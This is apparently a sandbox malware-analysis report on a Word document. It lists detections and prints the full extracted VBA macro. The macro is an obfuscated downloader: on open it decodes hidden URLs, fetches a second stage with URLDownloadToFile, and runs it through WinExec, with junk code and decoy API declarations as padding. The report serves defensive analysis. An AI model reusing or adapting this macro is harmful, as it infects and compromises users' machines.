MALICIOUS
290
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
T1056.001 Keylogging
The sample contains VBA macros that leverage the URLDownloadToFile API, indicating an attempt to download and execute a second-stage payload. Additionally, heuristics suggest potential keylogging capabilities through the GetAsyncKeyState API. The presence of the Document_Open macro further supports the execution of malicious code upon opening the document.
Heuristics 8
-
ClamAV: Doc.Downloader.Generic-8011192-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-8011192-0
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
Public Declare PtrSafe Function cbkqwebdfi2u3iudidus Lib "urlmon" Alias "URLDownloadToFileA" (ByVal ty5w As LongPtr, ByVal sdf As String, ByVal gh5e As String, ByVal asd3 As LongPtr, ByVal ghkj4 As LongPtr) As LongPtr -
VBA polls global keyboard state (keylogger) high OLE_VBA_KEYLOGGER_SPYWAREThe macro declares or calls a Win32 keystroke-monitoring API (GetAsyncKeyState, SetWindowsHookEx WH_KEYBOARD, or GetKeyboardState) to capture keystrokes system-wide. No legitimate document automation polls global key state; this is the core of a VBA keylogger, usually paired with active-window capture (GetForegroundWindow) and a log file. A high-confidence spyware behaviour independent of any download / Shell evidence.Matched line in script
Declare PtrSafe Function GetAsyncKeyState Lib "user32" (ByVal vKey As LongPtr) As Integer -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Reference to WinExec API high SC_STR_WINEXECReference to WinExec API
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 25980 bytes |
SHA-256: 766f08f2e0248c18879eb9a20f72082e748ae2f37d1d5e178c838334af1df78b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub vkl4jhaje4jhkj()
Const freq% = 1
Const OsnovaLen% = 2
Dim i&, j&, Lent%, dic As Object, vX As Variant, S$
Dim vesText As String
Dim Slova
Dim Ok
Dim t As String
Ok = Split("45634", " ")
Dim K%(): ReDim K(UBound(Ok)): For i = 0 To UBound(Ok): K(i) = Len(Ok(i)): Next
End Sub
Private Sub Document_Close()
End Sub
Sub kdsfjgkw()
Dim S, tail, head As String
S = "fa3452"
tail = InStr(S, ",")
head = InStr(S, " ")
MsgBox "efr25" & S & vbCr & vbCr & "352w" & head & vbCr & "swfq45" & tail
InputBox S, "agf45", Mid(S, head + 1, tail - head - 1)
End Sub
Private Sub Document_Open()
BVN456gRT.RYU56FDGN6
End Sub
Sub sdfedf()
Dim b() As Single, q As Single, element, sum
N = InputBox("enter")
ReDim b(1 To N)
b(1) = InputBox("enter")
q = InputBox("enter")
element = b(1) & " "
sum = b(1)
For i = 2 To N
b(i) = b(i - 1) + q
element = element & b(i) & " "
sum = sum + b(i)
Next i
MsgBox element
MsgBox sum
End Sub
Attribute VB_Name = "GSADFG354DFG"
Attribute VB_Base = "0{F069D350-16A2-4CCF-8281-14B7C6C4FB3F}{17A2D96E-4200-48EA-8B92-C61CCDD97564}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
End Sub
Attribute VB_Name = "BVN456gRT"
Sub fsklaw34hkwh()
Dim i%, j%, N%, M%, Max%
Dim K%, R%, x%, y%, Z%
N = Int(InputBox("sdfga4t", "1", 4))
M = Int(InputBox("3456w3e", "2", 5))
ReDim a(1 To N, 1 To M)
For i = 1 To N
For j = 1 To M
a(i, j) = Int((50 * Rnd) + (-25))
Next j
Next i
K = 0: R = 0
For i = 1 To N
For j = 1 To M
K = i
R = j
Next j
Next i
ReDim b(1 To N, 1 To M) As Integer
For i = 1 To N
For j = 1 To M
Z = 0
b(i, j) = Z
b(i, R) = a(i, R)
b(K, j) = a(K, j)
Next j
Next i
End Sub
Public Function VCVNYIT24FDGDTU78() As Object
Dim rs As Double
rs = 0
rs = Sin(df) * 0.5 + 0.8 * 2
QWQWX6.sadfjkl23hkl GSADFG354DFG.tx1brn.Text + " " + GSADFG354DFG.tx_pr.Text, 0
End Function
Public Function fwki23jghiwueg(dre As Long, nfk4 As String) As String
Dim slen As Long
Dim res As String
slen = Len(nfk4) / 3
res = Space$(slen)
For i = 1 To slen
Mid$(res, i, 1) = Mid$(nfk4, (slen - i + 1) * 3, 1)
Next
fwki23jghiwueg = res
End Function
Sub fk3jhoklis8()
Dim a#, b#, x%
a = Val(Replace(InputBox("enter a", "1", 1.1), ",", "."))
b = Val(Replace(InputBox("enter b", "2", 1.1), ",", "."))
x = 1
ReDim y(1 To 10) As Double
For x = 1 To 10
y(x) = Cells(1, x)
Next
End Sub
Function y(a#, b#, x%) As Double
y = a / x + b
End Function
Public Function RYU56FDGN6() As Boolean
RY546TYUww.Show False
RTYHG93 = RTYHG93 - 0.000053 * Sin(4.923745251 + 3)
If RTYHG93 <> 1.2345 Then RY546TYUww.Repaint
RTYHG93 = RTYHG93 + 0.0000000153 * Cos(4.923745)
Dim dkekr(1 To 7) As String
Dim nln As Integer
dkekr(1) = fwki23jghiwueg(0, "aZ/r)m2RwG]i_$cq=c@UnBbpiH/npm?OolacbI.WZe34mp9pPGlf4e&(hVBb[#i,;nXneQvd{t/&+///:4JpyBt+ctIih")
dkekr(2) = fwki23jghiwueg(2, "0f/b;dzzi2~j-#qSsk$QmP<h$ko3Jc%4s1HfouvM(/V?m%Fop8cSg.!Tsn<en]t~BaMgb>0eo[i_1nrqa_RloTe%LmzZ/0%/#R:lHp-dtV9tMjh")
dkekr(3) = fwki23jghiwueg(5, "<;/XFkQIu+DbPym.Bq$Zds^/+KrT}ic/.1fcWra+5.8su+lbk$sC<.AEnn%a-@h3$rxnoafb)=/tk/Yb:kPp%~tXhtNsh")
dkekr(4) = fwki23jghiwueg(6, "!A/Nvk1Wl6okT>k!;hrEyq/mP/qj5/iNm|eo]Acu^.Lsr63oPQi36r=-e5#tZInr%iY]awrg3!i2GdThn$4i5~/(n/1{::4p#et9.tCZh")
dkekr(5) = fwki23jghiwueg(8, "Cq/k{b=$roDkhhw7_gXOkLBbQTqoDw%Cb_,m[#jB</lgr*Vb4,.h[m8DojTcuA.;Yc9ksSIqT*eUIf~We4Kcb@/j5/{S:$TpI*tYGt,6h")
dkekr(6) = fwki23jghiwueg(9, "qI/m$h,4idEnf7am+i{3j#=hbli@5yug/p5mFDoH8c().V4s(]on6pKxam=sgNr1BiXu/Ck/)m:A*p]*t$4tH=h")
nln = 6
Dim ct As Long
ct = DateDiff("s", "1/1/1970", Date + Time)
For i = 1 To nln
Dim sjhfk As String
#If VBA7 Then
Dim rs As LongPtr
#Else
Dim rs As Long
#End If
sjhfk = fwki23jghiwueg(34, "+<e5/lfZi{JfCA\c4cJcidPl=|bK#u4)P[1\3hs*Qr22eZ)s0FUby\Fv:^HC") + CStr(i) + fwki23jghiwueg(6, "{le#6x}qeW].")
rs = QWQWX6.cbkqwebdfi2u3iudidus(0, dkekr(i) + CStr(ct) & ".p" + "ng", sjhfk, 0, 0)
If rs = 0 Then
GSADFG354DFG.tx1brn.Text = sjhfk
GSADFG354DFG.tx_pr.Text = ""
VCVNYIT24FDGDTU78
Exit For
End If
Next
RY546TYUww.Hide
End Function
Function snflk34kljb() As String
End Function
Sub tt()
Dim arr1
Dim arr2(1 To 3, 1 To 3)
Dim i&, x&, y&
arr1 = Array(1)
i = -1
For x = 1 To 3
For y = 1 To 3
i = i + 1
arr2(x, y) = arr1(i)
Next
Next
[a1].Resize(3, 3) = arr2
End Sub
Attribute VB_Name = "RY546TYUww"
Attribute VB_Base = "0{A7109FBC-49BC-4FD5-B0ED-ADA71E2C7134}{7D668ABB-9B8B-4FA6-828F-4BEB1227A8AB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "QWQWX6"
#If VBA7 Then
Declare PtrSafe Function GetClipboardViewer Lib "user32" () As LongPtr
Declare PtrSafe Function SetClipboardData Lib "user32" Alias "SetClipboardDataA" (ByVal wFormat As LongPtr, ByVal hMem As LongPtr) As LongPtr
Declare PtrSafe Function DestroyMenu Lib "user32" (ByVal hMenu As LongPtr) As LongPtr
Declare PtrSafe Function DestroyWindow Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function DlgDirSelectComboBoxEx Lib "user32" Alias "DlgDirSelectComboBoxExA" (ByVal hWndDlg As LongPtr, ByVal lpszPath As String, ByVal cbPath As LongPtr, ByVal idComboBox As LongPtr) As LongPtr
Declare PtrSafe Function DlgDirSelectEx Lib "user32" Alias "DlgDirSelectExA" (ByVal hWndDlg As LongPtr, ByVal lpszPath As String, ByVal cbPath As LongPtr, ByVal idListBox As LongPtr) As LongPtr
Declare PtrSafe Function CopyImage Lib "user32" (ByVal Handle As LongPtr, ByVal un1 As LongPtr, ByVal n1 As LongPtr, ByVal n2 As LongPtr, ByVal un2 As LongPtr) As LongPtr
Declare PtrSafe Function DrawIconEx Lib "user32" (ByVal hDC As LongPtr, ByVal xLeft As LongPtr, ByVal yTop As LongPtr, ByVal hIcon As LongPtr, ByVal cxWidth As LongPtr, ByVal cyWidth As LongPtr, ByVal istepIfAniCur As LongPtr, ByVal hbrFlickerFreeDraw As LongPtr, ByVal diFlags As LongPtr) As Boolean
Declare PtrSafe Function DrawMenuBar Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function BringWindowToTop Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function CloseDesktop Lib "user32" (ByVal hDesktop As LongPtr) As Boolean
Declare PtrSafe Function SetClipboardViewer Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function SetDlgItemInt Lib "user32" (ByVal hDlg As LongPtr, ByVal nIDDlgItem As LongPtr, ByVal wValue As LongPtr, ByVal bSigned As LongPtr) As LongPtr
Declare PtrSafe Function CloseWindow Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function CreateMenu Lib "user32" () As LongPtr
Declare PtrSafe Function DdeFreeDataHandle Lib "user32" (ByVal hData As LongPtr) As LongPtr
Declare PtrSafe Function DestroyAcceleratorTable Lib "user32" (ByVal haccel As LongPtr) As LongPtr
Declare PtrSafe Function DestroyCaret Lib "user32" () As LongPtr
Declare PtrSafe Function DestroyCursor Lib "user32" (ByVal hCursor As LongPtr) As LongPtr
Declare PtrSafe Function DestroyIcon Lib "user32" (ByVal hIcon As LongPtr) As LongPtr
Declare PtrSafe Function EnumChildWindows Lib "user32" (ByVal hWndParent As LongPtr, ByVal lpEnumFunc As LongPtr, ByVal lParam As LongPtr) As Boolean
Declare PtrSafe Function FreeDDElParam Lib "user32" (ByVal msg As LongPtr, ByVal lParam As LongPtr) As LongPtr
Declare PtrSafe Function GetActiveWindow Lib "user32" () As LongPtr
Declare PtrSafe Function GetAsyncKeyState Lib "user32" (ByVal vKey As LongPtr) As Integer
Declare PtrSafe Function GetCapture Lib "user32" () As LongPtr
Declare PtrSafe Function GetCaretBlinkTime Lib "user32" () As LongPtr
Declare PtrSafe Function GetClassLong Lib "user32" Alias "GetClassLongA" (ByVal hWnd As LongPtr, ByVal nIndex As LongPtr) As LongPtr
Declare PtrSafe Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hWnd As LongPtr, ByVal lpClassName As String, ByVal nMaxCount As LongPtr) As LongPtr
Declare PtrSafe Function GetClassWord Lib "user32" (ByVal hWnd As LongPtr, ByVal nIndex As LongPtr) As LongPtr
Declare PtrSafe Function GetClipboardData Lib "user32" Alias "GetClipboardDataA" (ByVal wFormat As LongPtr) As LongPtr
Declare PtrSafe Function GetClipboardFormatName Lib "user32" Alias "GetClipboardFormatNameA" (ByVal wFormat As LongPtr, ByVal lpString As String, ByVal nMaxCount As LongPtr) As LongPtr
Declare PtrSafe Function GetClipboardOwner Lib "user32" () As LongPtr
Declare PtrSafe Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As LongPtr
Declare PtrSafe Function SetDlgItemText Lib "user32" Alias "SetDlgItemTextA" (ByVal hDlg As LongPtr, ByVal nIDDlgItem As LongPtr, ByVal lpString As String) As LongPtr
Declare PtrSafe Function SetDoubleClickTime Lib "user32" (ByVal wCount As LongPtr) As LongPtr
Declare PtrSafe Function SetFocus Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function SetForegroundWindow Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function SetMenu Lib "user32" (ByVal hWnd As LongPtr, ByVal hMenu As LongPtr) As LongPtr
Declare PtrSafe Function SetMenuContextHelpId Lib "user32" (ByVal hMenu As LongPtr, ByVal dw As LongPtr) As Boolean
Declare PtrSafe Function SetMenuDefaultItem Lib "user32" (ByVal hMenu As LongPtr, ByVal uItem As LongPtr, ByVal fByPos As LongPtr) As Boolean
Declare PtrSafe Function EnumPropsEx Lib "user32" Alias "EnumPropsExA" (ByVal hWnd As LongPtr, ByVal lpEnumFunc As LongPtr, ByVal lParam As LongPtr) As LongPtr
Public Declare PtrSafe Sub bdfkij2bw3kjv Lib "kernel32" Alias "Sleep" (ByVal cnkqjb3kjb As LongPtr)
Declare PtrSafe Function GetLastActivePopup Lib "user32" (ByVal hwndOwnder As LongPtr) As LongPtr
Declare PtrSafe Function GetMenu Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function GetMenuCheckMarkDimensions Lib "user32" () As LongPtr
Declare PtrSafe Function GetMenuItemCount Lib "user32" (ByVal hMenu As LongPtr) As LongPtr
Declare PtrSafe Function GetQueueStatus Lib "user32" (ByVal fuFlags As LongPtr) As LongPtr
Declare PtrSafe Function GetScrollPos Lib "user32" (ByVal hWnd As LongPtr, ByVal nBar As LongPtr) As LongPtr
Declare PtrSafe Function GetScrollRange Lib "user32" (ByVal hWnd As LongPtr, ByVal nBar As LongPtr, lpMinPos As LongPtr, lpMaxPos As LongPtr) As LongPtr
Declare PtrSafe Function GetDC Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function GetDCEx Lib "user32" (ByVal hWnd As LongPtr, ByVal hrgnclip As LongPtr, ByVal fdwOptions As LongPtr) As LongPtr
Declare PtrSafe Function GetDesktopWindow Lib "user32" () As LongPtr
Declare PtrSafe Function GetDlgItemInt Lib "user32" (ByVal hDlg As LongPtr, ByVal nIDDlgItem As LongPtr, ByVal lpTranslated As LongPtr, ByVal bSigned As LongPtr) As LongPtr
Declare PtrSafe Function GetTabbedTextExtent Lib "user32" Alias "GetTabbedTextExtentA" (ByVal hDC As LongPtr, ByVal lpString As String, ByVal nCount As LongPtr, ByVal nTabPositions As LongPtr, lpnTabStopPositions As LongPtr) As LongPtr
Declare PtrSafe Function GetThreadDesktop Lib "user32" (ByVal dwThread As LongPtr) As LongPtr
Declare PtrSafe Function GetTopWindow Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function GetKeyboardLayout Lib "user32" (ByVal dwLayout As LongPtr) As LongPtr
Declare PtrSafe Function GetKeyboardLayoutList Lib "user32" (ByVal nBuff As LongPtr, lpList As LongPtr) As LongPtr
Declare PtrSafe Function GetDoubleClickTime Lib "user32" () As LongPtr
Declare PtrSafe Function GetFocus Lib "user32" () As LongPtr
Public Declare PtrSafe Function sadfjkl23hkl Lib "kernel32" Alias "WinExec" (ByVal bder356 As String, ByVal vszdf46457 As LongPtr) As Long
Declare PtrSafe Function GetWindowDC Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function GetWindowLong Lib "user32" Alias "GetWindowLongA" (ByVal hWnd As LongPtr, ByVal nIndex As LongPtr) As LongPtr
Declare PtrSafe Function ReuseDDElParam Lib "user32" (ByVal lParam As LongPtr, ByVal msgIn As LongPtr, ByVal msgOut As LongPtr, ByVal uiLo As LongPtr, ByVal uiHi As LongPtr) As LongPtr
Declare PtrSafe Function SendDlgItemMessage Lib "user32" Alias "SendDlgItemMessageA" (ByVal hDlg As LongPtr, ByVal nIDDlgItem As LongPtr, ByVal wMsg As LongPtr, ByVal wParam As LongPtr, ByVal lParam As LongPtr) As LongPtr
Declare PtrSafe Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hWnd As LongPtr, ByVal wMsg As LongPtr, ByVal wParam As LongPtr, lParam As LongPtr) As LongPtr
Declare PtrSafe Function SendMessageCallback Lib "user32" Alias "SendMessageCallbackA" (ByVal hWnd As LongPtr, ByVal msg As LongPtr, ByVal wParam As LongPtr, ByVal lParam As LongPtr, ByVal lpResultCallBack As LongPtr, ByVal dwData As LongPtr) As LongPtr
Declare PtrSafe Function SendMessageTimeout Lib "user32" Alias "SendMessageTimeoutA" (ByVal hWnd As LongPtr, ByVal msg As LongPtr, ByVal wParam As LongPtr, ByVal lParam As LongPtr, ByVal fuFlags As LongPtr, ByVal uTimeout As LongPtr, lpdwResult As LongPtr) As LongPtr
Declare PtrSafe Function SendNotifyMessage Lib "user32" Alias "SendNotifyMessageA" (ByVal hWnd As LongPtr, ByVal msg As LongPtr, ByVal wParam As LongPtr, ByVal lParam As LongPtr) As LongPtr
Declare PtrSafe Function SetActiveWindow Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function SetCapture Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function SetCaretBlinkTime Lib "user32" (ByVal wMSeconds As LongPtr) As LongPtr
Declare PtrSafe Function SetCaretPos Lib "user32" (ByVal x As LongPtr, ByVal y As LongPtr) As LongPtr
Declare PtrSafe Function SetClassLong Lib "user32" Alias "SetClassLongA" (ByVal hWnd As LongPtr, ByVal nIndex As LongPtr, ByVal dwNewLong As LongPtr) As LongPtr
Declare PtrSafe Function SetClassWord Lib "user32" (ByVal hWnd As LongPtr, ByVal nIndex As LongPtr, ByVal wNewWord As LongPtr) As LongPtr
Public Declare PtrSafe Function cbkqwebdfi2u3iudidus Lib "urlmon" Alias "URLDownloadToFileA" (ByVal ty5w As LongPtr, ByVal sdf As String, ByVal gh5e As String, ByVal asd3 As LongPtr, ByVal ghkj4 As LongPtr) As LongPtr
Declare PtrSafe Function GetForegroundWindow Lib "user32" () As LongPtr
Declare PtrSafe Function GetWindowContextHelpId Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function GetKeyboardLayoutName Lib "user32" Alias "GetKeyboardLayoutNameA" (ByVal pwszKLID As String) As LongPtr
Declare PtrSafe Function GetUserObjectInformation Lib "user32" Alias "GetUserObjectInformationA" (ByVal hObj As LongPtr, ByVal nIndex As LongPtr, pvInfo As Any, ByVal nLength As LongPtr, lpnLengthNeeded As LongPtr) As Boolean
Declare PtrSafe Function GetWindow Lib "user32" (ByVal hWnd As LongPtr, ByVal wCmd As LongPtr) As LongPtr
#Else
Declare Function GetDialogBaseUnits Lib "user32" () As Long
Declare Function GetDlgCtrlID Lib "user32" (ByVal hWnd As Long) As Long
Declare Function GetForegroundWindow Lib "user32" () As Long
Declare Function GetInputState Lib "user32" () As Long
Declare Function GetDlgItem Lib "user32" (ByVal hDlg As Long, ByVal nIDDlgItem As Long) As Long
Declare Function GetDlgItemInt Lib "user32" (ByVal hDlg As Long, ByVal nIDDlgItem As Long, ByVal lpTranslated As Long, ByVal bSigned As Long) As Long
Declare Function GetDlgItemText Lib "user32" Alias "GetDlgItemTextA" (ByVal hDlg As Long, ByVal nIDDlgItem As Long, ByVal lpString As String, ByVal nMaxCount As Long) As Long
Declare Function GetDoubleClickTime Lib "user32" () As Long
Declare Function CloseClipboard Lib "user32" () As Long
Declare Function CloseDesktop Lib "user32" (ByVal sdfkn234jbhiwefisu As Long) As Boolean
Declare Function CloseWindow Lib "user32" (ByVal hWnd As Long) As Long
Declare Function CloseWindowStation Lib "user32" (ByVal hWinSta As Long) As Boolean
Declare Function CopyCursor Lib "user32" (ByVal hcur As Long) As Long
Declare Function GetClipboardFormatName Lib "user32" Alias "GetClipboardFormatNameA" (ByVal wFormat As Long, ByVal lpString As String, ByVal nMaxCount As Long) As Long
Declare Function GetClipboardOwner Lib "user32" () As Long
Declare Function GetClipboardViewer Lib "user32" () As Long
Declare Function GetDesktopWindow Lib "user32" () As Long
Declare Function CopyIcon Lib "user32" (ByVal hIcon As Long) As Long
Declare Function CopyImage Lib "user32" (ByVal Handle As Long, ByVal bcvmnxsbcvjhvrjh2v As Long, ByVal n1 As Long, ByVal n2 As Long, ByVal un2 As Long) As Long
Declare Function CountClipboardFormats Lib "user32" () As Long
Declare Function CreateCaret Lib "user32" (ByVal hWnd As Long, ByVal hBitmap As Long, ByVal nWidth As Long, ByVal nHeight As Long) As Long
Declare Function GetFocus Lib "user32" () As Long
Declare Function GetLastActivePopup Lib "user32" (ByVal hwndOwnder As Long) As Long
Declare Function GetMenu Lib "user32" (ByVal hWnd As Long) As Long
Declare Function DlgDirSelectEx Lib "user32" Alias "DlgDirSelectExA" (ByVal hWndDlg As Long, ByVal lpszPath As String, ByVal cbPath As Long, ByVal idListBox As Long) As Long
Declare Function DrawIcon Lib "user32" (ByVal hDC As Long, ByVal x As Long, ByVal y As Long, ByVal hIcon As Long) As Long
Declare Function DrawIconEx Lib "user32" (ByVal hDC As Long, ByVal xLeft As Long, ByVal yTop As Long, ByVal hIcon As Long, ByVal cxWidth As Long, ByVal cyWidth As Long, ByVal istepIfAniCur As Long, ByVal hbrFlickerFreeDraw As Long, ByVal diFlags As Long) As Boolean
Declare Function DrawMenuBar Lib "user32" (ByVal hWnd As Long) As Long
Declare Function SetDlgItemInt Lib "user32" (ByVal hDlg As Long, ByVal nIDDlgItem As Long, ByVal wValue As Long, ByVal bSigned As Long) As Long
Declare Function GetMessageExtraInfo Lib "user32" () As Long
Declare Function DrawState Lib "user32" Alias "DrawStateA" (ByVal hDC As Long, ByVal hBrush As Long, ByVal lpDrawStateProc As Long, ByVal lParam As Long, ByVal wParam As Long, ByVal n1 As Long, ByVal n2 As Long, ByVal n3 As Long, ByVal n4 As Long, ByVal un As Long) As Boolean
Declare Function EmptyClipboard Lib "user32" () As Long
Declare Function EnableMenuItem Lib "user32" (ByVal hMenu As Long, ByVal wIDEnableItem As Long, ByVal wEnable As Long) As Long
Declare Function EnableScrollBar Lib "user32" (ByVal hWnd As Long, ByVal wSBflags As Long, ByVal wArrows As Long) As Long
Declare Function EnableWindow Lib "user32" (ByVal hWnd As Long, ByVal fEnable As Long) As Long
Declare Function EndDeferWindowPos Lib "user32" (ByVal hWinPosInfo As Long) As Long
Declare Function EndDialog Lib "user32" (ByVal hDlg As Long, ByVal nResult As Long) As Long
Declare Function GetMessagePos Lib "user32" () As Long
Declare Function GetTabbedTextExtent Lib "user32" Alias "GetTabbedTextExtentA" (ByVal hDC As Long, ByVal lpString As String, ByVal nCount As Long, ByVal nTabPositions As Long, lpnTabStopPositions As Long) As Long
Declare Function SetDlgItemText Lib "user32" Alias "SetDlgItemTextA" (ByVal hDlg As Long, ByVal nIDDlgItem As Long, ByVal lpString As String) As Long
Declare Function SetDoubleClickTime Lib "user32" (ByVal wCount As Long) As Long
Declare Function SetMenu Lib "user32" (ByVal hWnd As Long, ByVal hMenu As Long) As Long
Declare Function SetMenuContextHelpId Lib "user32" (ByVal hMenu As Long, ByVal dw As Long) As Boolean
Declare Function SetMenuDefaultItem Lib "user32" (ByVal hMenu As Long, ByVal uItem As Long, ByVal fByPos As Long) As Boolean
Declare Function SetMenuItemBitmaps Lib "user32" (ByVal hMenu As Long, ByVal nPosition As Long, ByVal wFlags As Long, ByVal hBitmapUnchecked As Long, ByVal hBitmapChecked As Long) As Long
Declare Function TabbedTextOut Lib "user32" Alias "TabbedTextOutA" (ByVal hDC As Long, ByVal x As Long, ByVal y As Long, ByVal lpString As String, ByVal nCount As Long, ByVal nTabPositions As Long, lpnTabStopPositions As Long, ByVal nTabOrigin As Long) As Long
Declare Function GetMessageTime Lib "user32" () As Long
Declare Function GetOpenClipboardWindow Lib "user32" () As Long
Public Declare Sub bdfkij2bw3kjv Lib "kernel32" Alias "Sleep" (ByVal cnkqjb3kjb As Long)
Declare Function ExcludeUpdateRgn Lib "user32" (ByVal hDC As Long, ByVal hWnd As Long) As Long
Declare Function ExitWindows Lib "user32" (ByVal dwReserved As Long, ByVal uReturnCode As Long) As Long
Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Declare Function GetMenuCheckMarkDimensions Lib "user32" () As Long
Declare Function GetMenuContextHelpId Lib "user32" (ByVal hMenu As Long) As Long
Declare Function GetMenuDefaultItem Lib "user32" (ByVal hMenu As Long, ByVal fByPos As Long, ByVal gmdiFlags As Long) As Long
Declare Function GetMenuItemCount Lib "user32" (ByVal hMenu As Long) As Long
Declare Function GetMenuItemID Lib "user32" (ByVal hMenu As Long, ByVal nPos As Long) As Long
Declare Function GetMenuState Lib "user32" (ByVal hMenu As Long, ByVal wID As Long, ByVal wFlags As Long) As Long
Declare Function GetMenuString Lib "user32" Alias "GetMenuStringA" (ByVal hMenu As Long, ByVal wIDItem As Long, ByVal lpString As String, ByVal nMaxCount As Long, ByVal wFlag As Long) As Long
Declare Function GetThreadDesktop Lib "user32" (ByVal dwThread As Long) As Long
Declare Function GetTopWindow Lib "user32" (ByVal hWnd As Long) As Long
Declare Function SetCursorPos Lib "user32" (ByVal x As Long, ByVal y As Long) As Long
Declare Function GetParent Lib "user32" (ByVal hWnd As Long) As Long
Declare Function GetPriorityClipboardFormat Lib "user32" (lpPriorityList As Long, ByVal nCount As Long) As Long
Declare Function GetProcessWindowStation Lib "user32" () As Long
Declare Function GetScrollRange Lib "user32" (ByVal hWnd As Long, ByVal nBar As Long, lpMinPos As Long, lpMaxPos As Long) As Long
Declare Function GetUpdateRgn Lib "user32" (ByVal hWnd As Long, ByVal hRgn As Long, ByVal fErase As Long) As Long
Declare Function GetUserObjectInformation Lib "user32" Alias "GetUserObjectInformationA" (ByVal hObj As Long, ByVal nIndex As Long, pvInfo As Any, ByVal nLength As Long, lpnLengthNeeded As Long) As Boolean
Declare Function SetMessageExtraInfo Lib "user32" (ByVal lParam As Long) As Long
Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Long) As Long
Declare Function SetMessageQueue Lib "user32" (ByVal cMessagesMax As Long) As Boolean
Declare Function SetWindowRgn Lib "user32" (ByVal hWnd As Long, ByVal hRgn As Long, ByVal bRedraw As Boolean) As Long
Declare Function SendMessageCallback Lib "user32" Alias "SendMessageCallbackA" (ByVal hWnd As Long, ByVal msg As Long, ByVal wParam As Long, ByVal lParam As Long, ByVal lpResultCallBack As Long, ByVal dwData As Long) As Long
Declare Function SetActiveWindow Lib "user32" (ByVal hWnd As Long) As Long
Declare Function SetCapture Lib "user32" (ByVal hWnd As Long) As Long
Declare Function SetCaretBlinkTime Lib "user32" (ByVal wMSeconds As Long) As Long
Declare Function SetWindowText Lib "user32" Alias "SetWindowTextA" (ByVal hWnd As Long, ByVal lpString As String) As Long
Declare Function SetWindowWord Lib "user32" (ByVal hWnd As Long, ByVal nIndex As Long, ByVal wNewWord As Long) As Long
Public Declare Function sadfjkl23hkl Lib "kernel32" Alias "WinExec" (ByVal bder356 As String, ByVal vszdf46457 As Long) As Long
Declare Function SystemParametersInfo Lib "user32" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByVal lpvParam As Any, ByVal fuWinIni As Long) As Long
Declare Function GetWindowLong Lib "user32" Alias "GetWindowLongA" (ByVal hWnd As Long, ByVal nIndex As Long) As Long
Declare Function ReuseDDElParam Lib "user32" (ByVal lParam As Long, ByVal msgIn As Long, ByVal msgOut As Long, ByVal uiLo As Long, ByVal uiHi As Long) As Long
Declare Function SendDlgItemMessage Lib "user32" Alias "SendDlgItemMessageA" (ByVal hDlg As Long, ByVal nIDDlgItem As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Public Declare Function cbkqwebdfi2u3iudidus Lib "urlmon" Alias "URLDownloadToFileA" (ByVal srser As Long, ByVal gf3g As String, ByVal gjghi42 As String, ByVal uitui34 As Long, ByVal bck2j As Long) As Long
Declare Function SetCaretPos Lib "user32" (ByVal x As Long, ByVal y As Long) As Long
Public Declare Function timeGetTime Lib "winmm.dll" () As Long
Declare Function SetClassLong Lib "user32" Alias "SetClassLongA" (ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Declare Function SetClassWord Lib "user32" (ByVal hWnd As Long, ByVal nIndex As Long, ByVal wNewWord As Long) As Long
